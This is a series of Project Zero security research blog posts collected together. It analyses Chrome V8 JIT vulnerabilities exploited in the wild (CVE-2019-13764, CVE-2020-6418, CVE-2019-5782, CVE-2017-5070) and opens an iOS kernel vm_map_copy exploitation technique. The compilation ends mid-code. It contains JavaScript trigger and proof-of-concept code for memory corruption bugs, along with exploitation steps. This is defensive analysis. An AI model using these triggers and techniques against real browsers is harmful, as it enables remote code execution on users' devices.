                          slack_tracking_prediction);

[...]

When the argument is known to be an integer constant less than 16, the compiler inlines the array creation procedure and unrolls the element initialization loop. ReduceJSCreateArray doesn’t rely on the constant-folding reducer and implements its own less strict equivalent that just compares the upper and lower bounds of the inferred type. Unfortunately, even after folding the function keeps using the original argument node. The folded value is employed during initialization of the backing store while the length property of the array is set to the original node. This means that if we pass the value we obtained at step five to the constructor, it will return an array with the negative length and backing store that can fit 13 elements. Given that bounds checks are implemented as unsigned comparisons, the сrafted array will allow us to access data well past its end. In fact, any positive value bigger than its predicted version would work as well.

The rest of the trigger function is provided below:

[...]

  corrupted_array = Array(i);

  corrupted_array[0] = 1.1;

  ptr_leak_array = [wasm_module, array_buffer, [...],

                    wasm_module, array_buffer]; 

  extra_array = [13.37, [...], 13.37, 1.234]; 

  return [corrupted_array, ptr_leak_array, extra_array];

}

The attacker forces TurboFan to put the data required for further exploitation right next to the corrupted array and to use the double element type for the backing store as it’s the most convenient type for dealing with out-of-bounds data in the V8 heap.

From this point on, the exploit follows the same algorithm that public V8 exploits have been following for several years:

  1. Locate the required pointers and object fields through pattern-matching.
  2. Construct an arbitrary memory access primitive using an extra JavaScript array and ArrayBuffer.
  3. Follow the pointer chain from a WebAssembly module instance to locate a writable and executable memory page.
  4. Overwrite the body of a WebAssembly function inside the page with the attacker’s payload.
  5. Finally, execute it.

The contents of the payload, which is about half a megabyte in size, will be discussed in detail in a subsequent blog post.

Given that the vast majority of Chrome exploits we have seen at Project Zero come from either exploit competitions or VRP submissions, the most striking difference this exploit has demonstrated lies in its focus on stability and reliability. Here are some examples. Almost the entire exploit is executed inside a web worker, which means it has a separate JavaScript environment and runs in its own thread. This greatly reduces the chance of the garbage collector causing an accidental crash due to the inconsistent heap state. The main thread part is only responsible for restarting the worker in case of failure and passing status information to the attacker’s server. The exploit attempts to further reduce the time window for GC crashes by ensuring that every corrupted field is restored to the original value as soon as possible. It also employs the OOB access primitive early on to verify the processor architecture information provided in the user agent header. Finally, the author has clearly aimed to keep the number of hard-coded constants to a minimum. Despite supporting a wide range of Chrome versions, the exploit relies on a single version-dependent offset, namely, the offset in the WASM instance to the executable page pointer.

Patch 1

Even though there’s evidence this vulnerability has been originally used as a 0-day, by the time we obtained the exploit, it had already been fixed. The issue was reported to Chrome by security researchers Soyeon Park and Wen Xu in November 2019 and was assigned CVE-2019-13764. The proof of concept provided in the report is shown below:

function write(begin, end, step) {

  for (var i = begin; i >= end; i += step) {

    step = end - begin;

    begin >>>= 805306382;

  }

}

var buffer = new ArrayBuffer(16384);

var view = new Uint32Array(buffer);

for (let i = 0; i < 10000; i++) {

  write(Infinity, 1, view[65536], 1);

}

As the reader can see, it’s not the most straightforward way to trigger the issue. The code resembles fuzzer output, and the reporters confirmed that the bug had been found through fuzzing. Given the available evidence, we’re fully confident that it was an independent discovery (sometimes referred to as a "bug collision").

Since the proof of concept could only lead to a SIGTRAP crash, and the reporters hadn’t demonstrated, for example, a way to trigger memory corruption, it was initially considered a low-severity issue by the V8 engineers, however, after an internal discussion, the V8 team raised the severity rating to high.

In the light of the in-the-wild exploitation evidence, we decided to give the fix, which had introduced an explicit check for the NaN case, a thorough examination:

[...]

const bool both_types_integer =

    initial_type.Is(typer_->cache_->kInteger) &&

    increment_type.Is(typer_->cache_->kInteger);

bool maybe_nan = false;

// The addition or subtraction could still produce a NaN, if the integer

// ranges touch infinity.

if (both_types_integer) {

  Type resultant_type =

      (arithmetic_type == InductionVariable::ArithmeticType::kAddition)

          ? typer_->operation_typer()->NumberAdd(initial_type,

                                                 increment_type)

          : typer_->operation_typer()->NumberSubtract(initial_type,

                                                      increment_type);

  maybe_nan = resultant_type.Maybe(Type::NaN());

}

// We only handle integer induction variables (otherwise ranges

// do not apply and we cannot do anything).

if (!both_types_integer || maybe_nan) {

[...]

The code makes the assumption that the loop variable may only become NaN if the sum or difference of initial and increment is NaN. At first sight, it seems like a fair assumption. The issue arises from the fact that the value of increment can be changed from inside the loop, which isn’t obvious from the exploit but demonstrated in the proof of concept sent to Chrome. The typer takes into account these changes and reflects them in increment’s computed type. Therefore, the attacker can, for example, add negative increment to i until the latter becomes -Infinity, then change the sign of increment and force the loop to produce NaN once more, as demonstrated by the code below:

var increment = -Infinity;

var k = 0;

for (var i = 0; i < 1; i += increment) {

  if (i == -Infinity) {

    increment = +Infinity;

  }

  if (++k > 10) {

    break;

  }

}

Thus, to “revive” the entire exploit, the attacker only needs to change a couple of lines in trigger.

Patch 2

The discovered variant was reported to Chrome in February along with the exploitation technique found in the exploit. This time the patch took a more conservative approach and made the function bail out as soon as the typer detects that increment can be Infinity.

[...]

// If we do not have enough type information for the initial value or

// the increment, just return the initial value's type.

if (initial_type.IsNone() ||

    increment_type.Is(typer_->cache_->kSingletonZero)) {

  return initial_type;

}

// We only handle integer induction variables (otherwise ranges do not

// apply and we cannot do anything). Moreover, we don't support infinities

// in {increment_type} because the induction variable can become NaN

// through addition/subtraction of opposing infinities.

if (!initial_type.Is(typer_->cache_->kInteger) ||

    !increment_type.Is(typer_->cache_->kInteger) ||

    increment_type.Min() == -V8_INFINITY ||

    increment_type.Max() == +V8_INFINITY) {

[...]

Additionally, ReduceJSCreateArray was updated to always use the same value for both the  length property and backing store capacity, thus rendering the reported exploitation technique useless.

Unfortunately, the new patch contained an unintended change that introduced another security issue. If we look at the source code of TypeInductionVariablePhi before the patches, we find that it checks whether the type of increment is limited to the constant zero. In this case, it assigns the type of initial to the induction variable. The second patch moved the check above the line that ensures initial is an integer. In JavaScript, however, adding or subtracting zero doesn’t necessarily preserve the type, for example:

-0

+

0

=>

-0

[string]

-

0

=>

[number]

[object]

+

0

=>

[string]

As a result, the patched function provides us with an even wider choice of possible “type confusions”.

It was considered worthwhile to examine how difficult it would be to find a replacement for the ReduceJSCreateArray technique and exploit the new issue. The task turned out to be a lot easier than initially expected because we soon found this excellent blog post written by Jeremy Fetiveau, where he describes a way to bypass the initial bounds check elimination hardening. In short, depending on whether the engine has encountered an out-of-bounds element access attempt during the execution of a function in the interpreter, it instructs the compiler to emit either the CheckBounds or NumberLessThan node, and only the former is covered by the hardening. Consequently, the attacker just needs to make sure that the function attempts to access a non-existent array element in one of the first few invocations.

We find it interesting that even though this equally powerful and convenient technique has been publicly available since last May, the attacker has chosen to rely on their own method. It is conceivable that the exploit had been developed even before the blog post came out.

Once again, the technique requires an integer with a miscalculated range, so the revamped trigger function mostly consists of various type transformations:

function trigger(arg) {

  // Initially:

  // actual = 1, inferred = any

  var k = 0;

 

  arg = arg | 0;

  // After step one:

  // actual = 1, inferred = [-0x80000000, 0x7fffffff]

 

  arg = Math.min(arg, 2);

  // After step two:

  // actual = 1, inferred = [-0x80000000, 2]

 

  arg = Math.max(arg, 1);

  // After step three:

  // actual = 1, inferred = [1, 2]

 

  if (arg == 1) {

    arg = "30";

  }

  // After step four:

  // actual = string{30}, inferred = [1, 2] or string{30}

 

  for (var i = arg; i < 0x1000; i -= 0) {

    if (++k > 1) {

      break;

    }

  }

  // After step five:

  // actual = number{30}, inferred = [1, 2] or string{30}

 

  i += 1;

  // After step six:

  // actual = 31, inferred = [2, 3]

 

  i >>= 1;

  // After step seven:

  // actual = 15, inferred = 1

 

  i += 2;

  // After step eight:

  // actual = 17, inferred = 3

 

  i >>= 1;

  // After step nine:

  // actual = 8, inferred = 1

  var array = [0.1, 0.1, 0.1, 0.1];

  return [array[i], array];

}

The mismatch between the number 30 and string “30” occurs in step five. The next operation is represented by the SpeculativeSafeIntegerAdd node. The typer is aware that whenever this node encounters a non-number argument, it immediately triggers deoptimization. Hence, all non-number elements of the argument type can be ignored. The unexpected integer value, which obviously doesn’t cause the deoptimization, enables us to generate an erroneous range. Eventually, the compiler eliminates the NumberLessThan node, which is supposed to protect the element access in the last line, based on the observed range.

Patch 3

Soon after we had identified the regression, the V8 team landed a patch that removed the vulnerable code branch. They also took a number of additional hardening measures, for example:

  • Extended element access hardening, which now prevents the abuse of NumberLessThan nodes.
  • Discovered and fixed a similar problem with the elimination of MaybeGrowFastElements. Under certain conditions, this node, which may resize the backing store of a given array, is placed before StoreElement to ensure the array can fit the element. Consequently, the elimination of the node could allow an attacker to write data past the end of the backing store.
  • Implemented a verifier for induction variables that validates the computed type against the more conservative regular phi typing.

Furthermore, the V8 engineers have been working on a feature that allows TurboFan to insert runtime type checks into generated code. The feature should make fuzzing for typer issues much more efficient.

Conclusion

This blog post is meant to provide insight into the complexity of type tracking in JavaScript. The number of obscure rules and constraints an engineer has to bear in mind while working on the feature almost inevitably leads to errors, and, quite often even the slightest issue in the typer is enough to build a powerful and reliable exploit.

Also, the reader is probably familiar with the hypothesis of an enormous disparity between the state of public and private offensive security research. The fact that we’ve discovered a rather sophisticated attacker who has exploited a vulnerability in the class that has been under the scrutiny of the wider security community for at least a couple of years suggests that there’s nevertheless a certain overlap. Moreover, we were especially pleased to see a bug collision between a VRP submission and an in-the-wild 0-day exploit.

This is part 2 of a 6-part series detailing a set of vulnerabilities found by Project Zero being exploited in the wild. To continue reading, see In The Wild Part 3: Chrome Exploits.

...more

In-the-Wild Series: Chrome Exploits

Published: 2021-01-12 17:36:00

Popularity: 9

Author: Ryan

This is part 3 of a 6-part series detailing a set of vulnerabilities found by Project Zero being exploited in the wild. To read the other parts of the series, see the introduction post.

Posted by Sergei Glazunov, Project Zero

Introduction

As we continue the series on the watering hole attack discovered in early 2020, in this post we’ll look at the rest of the exploits used by the actor against Chrome. A timeline chart depicting the extracted exploits and affected browser versions is provided below. Different color shades represent different exploit versions.

All vulnerabilities used by the attacker are in V8, Chrome’s JavaScript engine; and more specifically, they are JIT compiler bugs. While classic C++ memory safety issues are still exploited in real-world attacks against web browsers, vulnerabilities in JIT offer many advantages to attackers. First, they usually provide more powerful primitives that can be easily turned into a reliable exploit without the need of a separate issue to, for example, break ASLR. Secondly, the majority of them are almost interchangeable, which significantly accelerates exploit development. Finally, bugs from this class allow the attacker to take advantage of a browser feature called web workers. Web developers use workers to execute additional tasks in a separate JavaScript environment. The fact that every worker runs in its own thread and has its own V8 heap makes exploitation significantly more predictable and stable.

The bugs themselves aren’t novel. In fact, three out of four issues have been independently discovered by external security researchers and reported to Chrome, and two of the reports even provided a full renderer exploit. While writing this post, we were more interested in learning about exploitation techniques and getting insight into a high-tier attacker’s exploit development process.

1. CVE-2017-5070

The vulnerability

This is an issue in Crankshaft, the JIT engine Chrome used before TurboFan. The alias analyzer, which is used by several optimization passes to determine whether two nodes may refer to the same object, produces incorrect results when one of the two nodes is a constant. Consider the following code, which has been extracted from one of the exploits:

global_array = [, 1.1];

 

function trigger(local_array) {

  var temp = global_array[0];

  local_array[1] = {};

  return global_array[1];

}

 

trigger([, {}]);

trigger([, 1.1]);

 

for (var i = 0; i < 10000; i++) {

  trigger([, {}]);

}

 

print(trigger(global_array));

The first line of the trigger function makes Crankshaft perform a map check on global_array (a map in V8 describes the “shape” of an object and includes the element representation information). The next line may trigger the double -> tagged element representation transition for local_array. Since the compiler incorrectly assumes that local_array and global_array can’t point to the same object, it doesn’t invalidate the recorded map state of global_array and, consequently, eliminates the “redundant” map check in the last line of the function.

The vulnerability grants an attacker a two-way type confusion between a JS object pointer and an unboxed double, which is a powerful primitive and is sufficient for a reliable exploit.

The issue was reported to Chrome by security researcher Qixun Zhao (@S0rryMybad) in May 2017 and fixed in the initial release of Chrome 59. The researcher also provided a renderer exploit. The fix made made the alias analyser use the constant comparison only when both arguments are constants:

 HAliasing Query(HValue* a, HValue* b) {

  [...]

     // Constant objects can be distinguished statically.

-    if (a->IsConstant()) {

+    if (a->IsConstant() && b->IsConstant()) {

       return a->Equals(b) ? kMustAlias : kNoAlias;

     }

     return kMayAlias;

Exploit 1

The earliest exploit we’ve discovered targets Chrome 37-58. This is the widest version range we’ve seen, which covers the period of almost three years. Unlike the rest of the exploits, this one contains a separate constant table for every supported browser build.

The author of the exploit takes a known approach to exploiting type confusions in JavaScript engines, which involves gaining the arbitrary read/write capability as an intermediate step. The exploit employs the issue to implement the addrof and fakeobj primitives. It “constructs” a fake ArrayBuffer object inside a JavaScript string, and uses the above primitives to obtain a reference to the fake object. Because strings in JS are immutable, the backing store pointer field of the fake ArrayBuffer can’t be modified. Instead, it’s set in advance to point to an extra ArrayBuffer, which is actually used for arbitrary memory access. Finally, the exploit follows a pointer chain to locate and overwrite the code of a JIT compiled function, which is stored in a RWX memory region.

The exploit is quite an impressive piece of engineering. For example, it includes a small framework for crafting fake JS objects, which supports assigning fields to real JS objects, fake sub-objects, tagged integers, etc. Since the bug can only be triggered once per JIT-compiled function, every time addrof or fakeobj is called, the exploit dynamically generates a new set of required objects and functions using eval.

The author also made significant efforts to increase the reliability of the exploit: there is a sanity check at every minor step; addrof stores all leaked pointers, and the exploit ensures they are still valid before accessing the fake object; fakeobj creates a giant string to store the crafted object contents so it gets allocated in the large object space, where objects aren’t moved by the garbage collector. And, of course, the exploit runs inside a web worker.

However, despite the efforts, the amount of auxiliary code and complexity of the design make accidental crashes quite probable. Also, the constructed fake buffer object is only well-formed enough to be accepted as an argument to the typed array constructor, but it’s unlikely to survive a GC cycle. Reliability issues are the likely reason for the existence of the second exploit.

Exploit 2

The second exploit for the same vulnerability aims at Chrome 47-58, i.e. a subrange of the previous exploit’s supported version range, and the exploit server always gives preference to the second exploit. The version detection is less strict, and there are just three distinct constant tables: for Chrome 47-49, 50-53 and 54-58.

The general approach is similar, however, the new exploit seems to have been rewritten from scratch with simplicity and conciseness in mind as it’s only half the size of the previous one. addrof is implemented in a way that allows leaking pointers to three objects at a time and only used once, so the dynamic generation of trigger functions is no longer needed. The exploit employs mutable on-heap typed arrays instead of JS strings to store the contents of fake objects; therefore, an extra level of indirection in the form of an additional ArrayBuffer is not required. Another notable change is using a RegExp object for code execution. The possible benefit here is that, unlike a JS function, which needs to be called many times to get JIT-compiled, a regular expression gets translated into native code already in the constructor.

While it’s possible that the exploits were written after the issue had become public, they greatly differ from the public exploit in both the design and implementation details. The attacker has thoroughly investigated the issue, for example, their trigger function is much more straightforward than in the public proof-of-concept.

2. CVE-2020-6418

The vulnerability

This is a side effect modelling issue in TurboFan. The function InferReceiverMapsUnsafe assumes that a JSCreate node can only modify the map of its value output. However, in reality, the node can trigger a property access on the new_target parameter, which is observable to user JavaScript if new_target is a proxy object. Therefore, the attacker can unexpectedly change, for example, the element representation of a JS array and trigger a type confusion similar to the one discussed above:

'use strict';

(function() {

  var popped;

 

  function trigger(new_target) {

    function inner(new_target) {

      function constructor() {

        popped = Array.prototype.pop.call(array);

      }

      var temp = array[0];

      return Reflect.construct(constructor, arguments, new_target);

    }

 

    inner(new_target);

  }

 

  var array = new Array(0, 0, 0, 0, 0);

 

  for (var i = 0; i < 20000; i++) {

    trigger(function() { });

    array.push(0);

  }

 

  var proxy = new Proxy(Object, {

    get: () => (array[4] = 1.1, Object.prototype)

  });

 

  trigger(proxy);

  print(popped);

}());

A call reducer (i.e., an optimizer) for Array.prototype.pop invokes InferReceiverMapsUnsafe, which marks the inference result as reliable meaning that it doesn’t require a runtime check. When the proxy object is passed to the vulnerable function, it triggers the tagged -> double element transition. Then pop takes a double element and interprets it as a tagged pointer value.

Note that the attacker can’t call the array function directly because for the expression array.pop() the compiler would insert an extra map check for the property read, which would be scheduled after the proxy handler had modified the array.

This is the only Chrome vulnerability that was still exploited as a 0-day at the time we discovered the exploit server. The issue was reported to Chrome under the 7-day deadline. The one-line patch modified the vulnerable function to mark the result of the map inference as unreliable whenever it encounters a JSCreate node:

InferReceiverMapsResult NodeProperties::InferReceiverMapsUnsafe(

[...]

  InferReceiverMapsResult result = kReliableReceiverMaps;

[...]

    case IrOpcode::kJSCreate: {

      if (IsSame(receiver, effect)) {

        base::Optional<MapRef> initial_map = GetJSCreateMap(broker, receiver);

        if (initial_map.has_value()) {

          *maps_return = ZoneHandleSet<Map>(initial_map->object());

          return result;

        }

        // We reached the allocation of the {receiver}.

        return kNoReceiverMaps;

      }

+     result = kUnreliableReceiverMaps;  // JSCreate can have side-effect.

      break;

    }

[...]

The reader can refer to the blog post published by Exodus Intel for more details on the issue and their version of the exploit.

Exploit 1

This time there’s no embedded list of supported browser versions; the appropriate constants for Chrome 60-63 are determined on the server side.

The exploit takes a rather exotic approach: it only implements a function for the confusion in the double -> tagged direction, i.e. the fakeobj primitive, and takes advantage of a side effect in pop to leak a pointer to the internal hole object. The function pop overwrites the “popped” value with the hole, but due to the same confusion it writes a pointer instead of the special bit pattern for double arrays.

The exploit uses the leaked pointer and fakeobj to implement a data leak primitive that can “survive'' garbage collection. First, it acquires references to two other internal objects, the class_start_position and class_end_position private symbols, owing to the fact that the offset between them and the hole is fixed. Private symbols are special identifiers used by V8 to store hidden properties inside regular JS objects. In particular, the two symbols refer to the start and end substring indices in the script source that represent the body of a class. When JSFunction::ToString is invoked on the class constructor and builds the substring, it performs no bounds checks on the “trustworthy” indices; therefore, the attacker can modify them to leak arbitrary chunks of data in the V8 heap.

The obtained data is scanned for values required to craft a fake typed array: maps, fixed arrays, backing store pointers, etc. This approach allows the attacker to construct a perfectly valid fake object. Since the object is located in a memory region outside the V8 heap, the exploit also has to create a fake MemoryChunk header and marking bitmap to force the garbage collector to skip the crafted objects and, thus, avoid crashes.

Finally, the exploit overwrites the code of a JIT-compiled function with a payload and executes it.

The author has implemented extensive sanity checking. For example, the data leak primitive is reused to verify that the garbage collector hasn’t moved critical objects. In case of a failure, the worker with the exploit gets terminated before it can cause a crash. Quite impressively, even when we manually put GC invocations into critical sections of the exploit, it was still able to exit gracefully most of the time.

The exploit employs an interesting technique to detect whether the trigger function has been JIT-compiled:

jit_detector[Symbol.toPrimitive] = function() {

  var stack = (new Error).stack;

  if (stack.indexOf("Number (") == -1) {

    jit_detector.is_compiled = true;

  }

};

function trigger(array, proxy) {

  if (!jit_detector.is_compiled) {

    Number(jit_detector);

  }

[...]

During compilation, TurboFan inlines the builtin function Number. This change is reflected in the JS call stack. Therefore, the attacker can scan a stack trace from inside a function that Number invokes to determine the compilation state.

The exploit was broken in Chrome 64 by the change that encapsulated both class body indices in a single internal object. Although the change only affected a minor detail of the exploit and had an obvious workaround, which is discussed below, the actor decided to abandon this 0-day and switch to an exploit for CVE-2019-5782. This observation suggests that the attacker was already aware of the third vulnerability around the time Chrome 64 came out, i.e. it was also used as a 0-day.

Exploit 2

After CVE-2019-5782 became unexploitable, the actor returned to this vulnerability. However, in the meantime, another commit landed in Chrome that stopped TurboFan from trying to optimize builtins invoked via Function.prototype.call or similar functions. Therefore, the trigger function had to be updated:

function trigger(new_target) {

  function inner(new_target) {

    popped = array.pop(

        Reflect.construct(function() { }, arguments, new_target));

  }

 

  inner(new_target);

}

By making the result of Reflect.construct an argument to the pop call, the attacker can move the corresponding JSCreate node after the map check induced by the property load.

The new exploit also has a modified data leak primitive. First, the attacker no longer relies on the side effect in pop to get an address on the heap and reuses the type confusion to implement the addrof function. Because the exploit doesn’t have a reference to the hole, it obtains the address of the builtin asyncIterator symbol instead, which is accessible to user scripts and also stored next to the desired class_positions private symbol.

The exploit can’t modify the class body indices directly as they’re not regular properties of the object referenced by class_positions. However, it can replace the entire object, so it generates an extra class with a much longer constructor string and uses it as a donor.

This version targets Chrome 68-72. It was broken by the commit that enabled the W^X protection for JIT regions. Again, given that there are still similar RWX mappings in the renderer related to WebAssembly, the exploit could have been easily fixed. The attacker, nevertheless, decided to focus on an exploit for CVE-2019-13764 instead.

Exploit 3 & 4

The actor returned once again to this vulnerability after CVE-2019-13764 got fixed. The new exploit bypasses the W^X protection by replacing a JIT-compiled JS function with a WebAssembly function as the overwrite target for code execution. That’s the only significant change made by the author.

Exploit 3 is the only one we’ve discovered on the Windows server, and Exploit 4 is essentially the same exploit adapted for Android. Interestingly, it only appeared on the Android server after the fix for the vulnerability came out. A significant amount of number and string literals got updated, and the pop call in the trigger function was replaced with a shift call. The actor likely attempted to avoid signature-based detection with those changes.

The exploits were used against Chrome 78-79 on Windows and 78-80 on Android until the vulnerability finally got patched.

The public exploit presented by Exodus Intel takes a completely different approach and abuses the fact that double and tagged pointer elements differ in size. When the same bug is applied against the function Array.prototype.push, the backing store offset for the new element is calculated incorrectly and, therefore, arbitrary data gets written past the end of the array. In this case the attacker doesn’t have to craft fake objects to achieve arbitrary read/write, which greatly simplifies the exploit. However, on 64-bit systems, this approach can only be used starting from Chrome 80, i.e. the version that introduced the pointer compression feature. While Chrome still runs in the 32-bit mode on Android in order to reduce memory overhead, user agent checks found in the exploits indicate that the actor also targeted (possibly 64-bit) webview processes.

3. CVE-2019-5782

The vulnerability

CVE-2019-5782 is an issue in TurboFan’s typer module. During compilation, the typer infers the possible type of every node in a function graph using a set of rules imposed by the language. Subsequent optimization passes rely on this information and can, for example, eliminate a security-critical check when the predicted type suggests the check would be redundant. A mismatch between the inferred type and actual value can, therefore, lead to security issues.

Note that in this context, the notion of type is quite different from, for example, C++ types. A TurboFan type can be represented by a range of numbers or even a specific value. For more information on typer bugs please refer to the previous post.

In this case an incorrect type is produced for the expression arguments.length, i.e. the number of arguments passed to a given function. The compiler assigns it the integer range [0; 65534], which is valid for a regular call; however, the same limit is not enforced for Function.prototype.apply. The mismatch was abused by the attacker to eliminate a bounds check and access data past the end of the array:

oob_index = 100000;

 

function trigger() {

  let array = [1.1, 1.1];

 

  let index = arguments.length;

  index = index - 65534;

  index = Math.max(index, 0);

   

  return array[index] = 2.2;

}

 

for (let i = 0; i < 20000; i++) {

  trigger(1,2,3);

}

 

print(trigger.apply(null, new Array(65534 + oob_index)));

Qixun Zhao used the same vulnerability in Tianfu Cup and reported it to Chrome in November 2018. The public report includes a renderer exploit. The fix, which landed in Chrome 72, simply relaxed the range of the length property.

The exploit

The discovered exploit targets Chrome 63-67. The exploit flow is a bit unconventional as it doesn’t rely on typed arrays to gain arbitrary read/write. The attacker makes use of the fact that V8 allocates objects in the new space linearly to precompute inter-object offsets. The vulnerability is only triggered once to corrupt the length property of a tagged pointer array. The corrupted array can then be used repeatedly to overwrite the elements field of an unboxed double array with an arbitrary JS object, which gives the attacker raw access to the contents of that object. It’s worth noting that this approach doesn’t even require performing manual pointer arithmetic. As usual, the exploit finishes by overwriting the code of a JS function with the payload.

Interestingly, this is the only exploit that doesn’t take advantage of running inside a web worker even though the vulnerability is fully compatible. Also, the amount of error checking is significantly smaller than in the previous exploits. The author probably assumed that the exploitation primitive provided by the issue was so reliable that all additional safety measures became unnecessary. Nevertheless, during our testing, we did occasionally encounter crashes when one of the allocations that the exploit makes managed to trigger garbage collection. That said, such crashes were indeed quite rare.

As the reader may have noticed, the exploit had stopped working long before the issue was fixed. The reason is that one of the hardening patches against speculative side-channel attacks in V8 broke the bounds check elimination technique used by the exploit. The protection was soon turned off for desktop platforms and replaced with site isolation; hence, the public exploit, which employs the same technique, was successfully used against Chrome 70 on Windows during the competition.

The public and private exploits have little in common apart from the bug itself and BCE technique, which has been commonly known since at least 2017. The public exploit turns out-of-bounds access into a type confusion and then follows the older approach, which involves crafting a fake array buffer object, to achieve code execution.

4. CVE-2019-13764

This more complex typer issue occurs when TurboFan doesn’t reflect the possible NaN value in the type of an induction variable. The bug can be triggered by the following code:

for (var i = -Infinity; i < 0; i += Infinity) { [...] }

This vulnerability and exploit for Chrome 73-79 have been discussed in detail in the previous blog post. There’s also an earlier version of the exploit targeting Chrome 69-72; the only difference is that the newer version switched from a JS JIT function to a WASM function as the overwrite target.

The comparison with the exploit for the previous typer issue (CVE-2019-5782) is more interesting, though. The developer put much greater emphasis on stability of the new exploit even though the two vulnerabilities are identical in this regard. The web worker wrapper is back, and the exploit doesn’t corrupt tagged element arrays to avoid GC crashes. Also, it no longer relies completely on precomputed offsets between objects in the new space. For example, to leak a pointer to a JS object the attacker puts it between marker values and then scans the memory for the matching pattern. Finally, the number of sanity checks is increased again.

It’s also worth noting that the new typer bug exploitation technique worked against Chrome on Android despite the side-channel attack mitigation and could have “revived” the exploit for CVE-2019-5782.

Conclusion

The timeline data and incremental changes between different exploit versions suggest that at least three out of the four vulnerabilities (CVE-2020-6418, CVE-2019-5782 and CVE-2019-13764) have been used as 0-days.

It is no secret that exploit reliability is a priority for high-tier attackers, but our findings  demonstrate the amount of resources the attackers are willing to spend on making their exploits extra reliable, especially the evidence that the actor has switched from an already high-quality 0-day to a slightly better vulnerability twice.

The area of JIT engine security has received great attention from the wider security community over the last few years. In 2015, when Chrome 37 came out, the exploit for CVE-2017-5070 would be considered quite ahead of its time. In contrast, if we don’t take into account the stability aspect, the exploit for the latest typer issue is not very different from exploits that enthusiasts made for JavaScript challenges at CTF competitions in 2019. This attention also likely affects the average lifetime of a JIT vulnerability and, therefore, may force attackers to move to different bug classes in the future.

This is part 3 of a 6-part series detailing a set of vulnerabilities found by Project Zero being exploited in the wild. To continue reading, see In The Wild Part 4: Android Exploits.

...more

One Byte to rule them all

Published: 2020-07-30 16:17:00

Popularity: 121

Author: Unknown

Posted by Brandon Azad, Project Zero

One Byte to rule them all, One Byte to type them,
One Byte to map them all, and in userspace bind them
-- Comment above vm_map_copy_t

For the last several years, nearly all iOS kernel exploits have followed the same high-level flow: memory corruption and fake Mach ports are used to gain access to the kernel task port, which provides an ideal kernel read/write primitive to userspace. Recent iOS kernel exploit mitigations like PAC and zone_require seem geared towards breaking the canonical techniques seen over and over again to achieve this exploit flow. But the fact that so many iOS kernel exploits look identical from a high level begs questions: Is targeting the kernel task port really the best exploit flow? Or has the convergence on this strategy obscured other, perhaps more interesting, techniques? And are existing iOS kernel mitigations equally effective against other, previously unseen exploit flows?

In this blog post, I'll describe a new iOS kernel exploitation technique that turns a one-byte controlled heap overflow directly into a read/write primitive for arbitrary physical addresses, all while completely sidestepping current mitigations such as KASLR, PAC, and zone_require. By reading a special hardware register, it's possible to locate the kernel in physical memory and build a kernel read/write primitive without a fake kernel task port. I'll conclude by discussing how effective various iOS mitigations were or could be at blocking this technique and by musing on the state-of-the-art of iOS kernel exploitation. You can find the proof-of-concept code here.

I - The Fellowship of the Wiring

A struct of power

While looking through the XNU sources, I often keep an eye out for interesting objects to manipulate or corrupt for future exploits. Soon after discovering CVE-2020-3837 (the oob_timestamp vulnerability), I stumbled across the definition of vm_map_copy_t:

struct vm_map_copy {
        int                     type;
#define VM_MAP_COPY_ENTRY_LIST          1
#define VM_MAP_COPY_OBJECT              2
#define VM_MAP_COPY_KERNEL_BUFFER       3
        vm_object_offset_t      offset;
        vm_map_size_t           size;
        union {
                struct vm_map_header    hdr;      /* ENTRY_LIST */
                vm_object_t             object;   /* OBJECT */
                uint8_t                 kdata[0]; /* KERNEL_BUFFER */
        } c_u;
};

This looked interesting to me for several reasons:

  1. The structure has a type field at the very start, so an out-of-bounds write could change it from one type to another, leading to type confusion. Because iOS is little-endian, the least significant byte comes first in memory, meaning that even a single-byte overflow would be sufficient to set the type to any of the three values.
  2. The type discriminates a union between arbitrary controlled data (kdata) and kernel pointers (hdr and object). Thus, corrupting the type could let us directly fake pointers to kernel objects without needing to perform any reallocations.
  3. I remembered reading about vm_map_copy_t being used as an interesting primitive in past exploits (before iOS 10), though I couldn't remember where or how it was used. vm_map_copy objects were also used by Ian Beer in Splitting atoms in XNU.

So, vm_map_copy looks like a possibly interesting target for corruption; however, it's only truly interesting if the code uses it in a truly interesting way.

Digging through osfmk/vm/vm_map.c, I found that vm_map_copyout_internal() does indeed use the copy object in a very interesting way. But first, let's talk a little more about what vm_map_copy is and how it works.

A vm_map_copy represents a copy-on-write slice of a process's virtual address space which has been packaged up, ready to be inserted into another virtual address space. There are three possible internal representations: as a list of vm_map_entry objects, as a vm_object, or as an inline array of bytes to be directly copied into the destination. We'll focus on types 1 and 3.

Fundamentally, the ENTRY_LIST type is the most powerful and general representation, while the KERNEL_BUFFER type is strictly an optimization. A vm_map_entry list consists of several allocations and several layers of indirection: each vm_map_entry describes a virtual address range [vme_start, vme_end) that is being mapped by a specific vm_object, which in turn contains a list of vm_pages describing the physical pages backing the vm_object.



Meanwhile, if the data being inserted is not shared memory and if the size is roughly two pages or less, then the vm_map_copy is simply over-allocated to hold the data contents inline in the same allocation, no indirection or further allocations required.



As a consequence of this optimization, the 8 bytes of the vm_map_copy object at offset 0x20 can be either a pointer to the head of a vm_map_entry list, or fully attacker-controlled data, all depending on the type field at the start. So corrupting the first byte of a vm_map_copy object causes the kernel to interpret arbitrary controlled data as a vm_map_entry pointer.



With this understanding of vm_map_copy internals, let's turn back to vm_map_copyout_internal(). This function is responsible for taking a vm_map_copy and inserting it into the destination address space (represented by type vm_map_t). It is reachable when sharing memory between processes by sending an out-of-line memory descriptor in a Mach message: the out-of-line memory is stored in the kernel as a vm_map_copy, and vm_map_copyout_internal() is the function that inserts it into the receiver's process.

As it turns out, things get rather exciting if vm_map_copyout_internal() processes a corrupted vm_map_copy containing a pointer to a fake vm_map_entry hierarchy. In particular, consider what happens if the fake vm_map_entry claims to be wired, which causes the function to try to fault in the page immediately:

kern_return_t
vm_map_copyout_internal(
    vm_map_t                dst_map,
    vm_map_address_t        *dst_addr,      /* OUT */
    vm_map_copy_t           copy,
    vm_map_size_t           copy_size,
    boolean_t               consume_on_success,
    vm_prot_t               cur_protection,
    vm_prot_t               max_protection,
    vm_inherit_t            inheritance)
{
...
    if (copy->type == VM_MAP_COPY_OBJECT) {
...
    }
...
    if (copy->type == VM_MAP_COPY_KERNEL_BUFFER) {
...
    }
...
    vm_map_lock(dst_map);
...
    adjustment = start - vm_copy_start;
...
    /*
     *    Adjust the addresses in the copy chain, and
     *    reset the region attributes.
     */
    for (entry = vm_map_copy_first_entry(copy);
        entry != vm_map_copy_to_entry(copy);
        entry = entry->vme_next) {
...
        entry->vme_start += adjustment;
        entry->vme_end += adjustment;
...
        /*
         * If the entry is now wired,
